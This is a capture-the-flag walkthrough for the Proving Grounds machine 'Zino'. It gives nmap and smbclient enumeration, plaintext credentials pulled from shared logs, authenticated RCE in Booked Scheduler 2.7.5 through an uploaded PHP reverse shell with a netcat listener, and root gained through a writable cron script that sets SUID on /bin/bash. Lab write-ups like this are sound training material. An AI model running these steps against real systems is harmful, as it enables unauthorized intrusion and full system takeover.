Zino
Exploitation Guide for Zino | Proving Grounds
Last updated
Was this helpful?
Exploitation Guide for Zino | Proving Grounds
Last updated
Was this helpful?
In this walkthrough we will get the credential from SMB for the web application which is vulnerable to Authenticated RCE. We will then exploit cronjob to escalate our privilege.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/zino/scans]
└─$ nmap $ip -p- -vv -Pn
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack
22/tcp open ssh syn-ack
139/tcp open netbios-ssn syn-ack
445/tcp open microsoft-ds syn-ack
3306/tcp open mysql syn-ack
8003/tcp open mcreport syn-ack
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
3306/tcp open mysql?
8003/tcp open http Apache httpd 2.4.38
| http-ls: Volume /
| SIZE TIME FILENAME
| - 2019-02-05 21:02 booked/
|_
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Index of /List shares using smbclient
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/zino/scans]
└─$ smbclient -L \\$ip -U "" -N -p 445 1 ⨯
Sharename Type Comment
--------- ---- -------
zino Disk Logs
print$ Disk Printer Drivers
IPC$ IPC IPC Service (Samba 4.9.5-Debian)
SMB1 disabled -- no workgroup available There is a share named zino which contains logs. Login to smb and if anonymous login is enabled download all the file to your machine.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/zino/scans]
└─$ smbclient '//192.168.233.64/zino' -p 445
Enter WORKGROUP\imtodess's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Jul 9 15:11:49 2020
.. D 0 Tue Apr 28 09:38:53 2020
.bash_history H 0 Tue Apr 28 11:35:28 2020
error.log N 265 Tue Apr 28 10:07:32 2020
.bash_logout H 220 Tue Apr 28 09:38:53 2020
local.txt N 33 Thu Aug 26 01:06:46 2021
.bashrc H 3526 Tue Apr 28 09:38:53 2020
.gnupg DH 0 Tue Apr 28 10:17:02 2020
.profile H 807 Tue Apr 28 09:38:53 2020
misc.log N 424 Tue Apr 28 10:08:15 2020
auth.log N 368 Tue Apr 28 10:07:54 2020
access.log N 5464 Tue Apr 28 10:07:09 2020
ftp D 0 Tue Apr 28 10:12:56 2020
smb: \> mget *
Get file .bash_history? y
NT_STATUS_ACCESS_DENIED opening remote file \.bash_history
Get file error.log? y
getting file \error.log of size 265 as error.log (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
Get file .bash_logout? y
getting file \.bash_logout of size 220 as .bash_logout (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
Get file local.txt? y
getting file \local.txt of size 33 as local.txt (0.0 KiloBytes/sec) (average 0.2 KiloBytes/sec)
Get file .bashrc? y
getting file \.bashrc of size 3526 as .bashrc (2.3 KiloBytes/sec) (average 0.9 KiloBytes/sec)
Get file .profile? y
getting file \.profile of size 807 as .profile (0.8 KiloBytes/sec) (average 0.9 KiloBytes/sec)
Get file misc.log? y
getting file \misc.log of size 424 as misc.log (0.4 KiloBytes/sec) (average 0.8 KiloBytes/sec)
Get file auth.log? y
getting file \auth.log of size 368 as auth.log (0.4 KiloBytes/sec) (average 0.8 KiloBytes/sec)
Get file access.log? y
getting file \access.log of size 5464 as access.log (5.6 KiloBytes/sec) (average 1.3 KiloBytes/sec)
In one of those log file we find credential admin:adminadmin
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/zino/loot]
└─$ cat misc.log
Apr 28 08:39:01 zino systemd[1]: Starting Clean php session files...
Apr 28 08:39:01 zino CRON[2791]: (CRON) info (No MTA installed, discarding output)
Apr 28 08:39:01 zino systemd[1]: phpsessionclean.service: Succeeded.
Apr 28 08:39:01 zino systemd[1]: Started Clean php session files.
Apr 28 08:39:01 zino systemd[1]: Set application username "admin"
Apr 28 08:39:01 zino systemd[1]: Set application password "adminadmin"
Login to web application using the credential we found earlier.
We successfully logged in.
Its a booked scheduler version 2.7.5
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/zino/loot]
└─$ searchsploit booked
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Booked Scheduler 2.7.5 - Remote Command Execution (Metasploit) | php/webapps/46486.rb
Booked Scheduler 2.7.7 - Authenticated Directory Traversal | php/webapps/48428.txt
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
There is RCE for version 2.7.5. Metasploit module is available but we will do it manually.
Description of vulnerability ( from exploit ):
We just need to upload malicious shell on /Web/admin/manage_theme.php under favicon then visit /Web/custom-favicon.php to trigger the shell.
Upload the shell.
I used
php reverse shellfrom https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.phpIf you are using kali then it is readily available in
/usr/share/webshells/php/php-reverse-shell.php
Now start a netcat listener and visit booked/Web/custom-favicon.php
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/zino/exploit]
└─$ nc -nvlp 8003 1 ⨯
listening on [any] 8003 ...
connect to [192.168.49.233] from (UNKNOWN) [192.168.233.64] 49342
Linux zino 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1 (2020-01-26) x86_64 GNU/Linux
01:33:20 up 3:52, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")' # upgrading shell to interactive
Get your local flag.
www-data@zino:/home/peter$ ls
access.log auth.log error.log ftp local.txt misc.log Check if there is any cronjob running. In our case there is one cronjob running which is executing python script as root.
www-data@zino:/tmp$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/3 * * * * root python /var/www/html/booked/cleanup.py
Check permission of the script.
www-data@zino:/tmp$ ls -la /var/www/html/booked/cleanup.py
-rwxrwxrwx 1 www-data www-data 120 Jul 3 04:22 /var/www/html/booked/cleanup.pyGreat we can write on file. You can do various thing with this. But for this walkthrough we will change the permission of /bin/bash and get root shell. You can try to get reverse shell if you want.
Remove previous command and replace it with following.
www-data@zino:/var/www/html/booked$ cat cleanup.py
#!/usr/bin/env python
import os
import sys
os.system('chmod +s /bin/bash') After some time the permission of /bin/bash will look like this.
www-data@zino:/var/www/html/booked$ ls -la /bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18 2019 /bin/bash
Now just do /bin/bash -p and you will have root shell.
www-data@zino:/var/www/html/booked$ /bin/bash -p
bash-5.0# whoami
root
bash-5.0# cd /root
bash-5.0# cat proof.txt
999e78a<Redacted>5dbf30f2
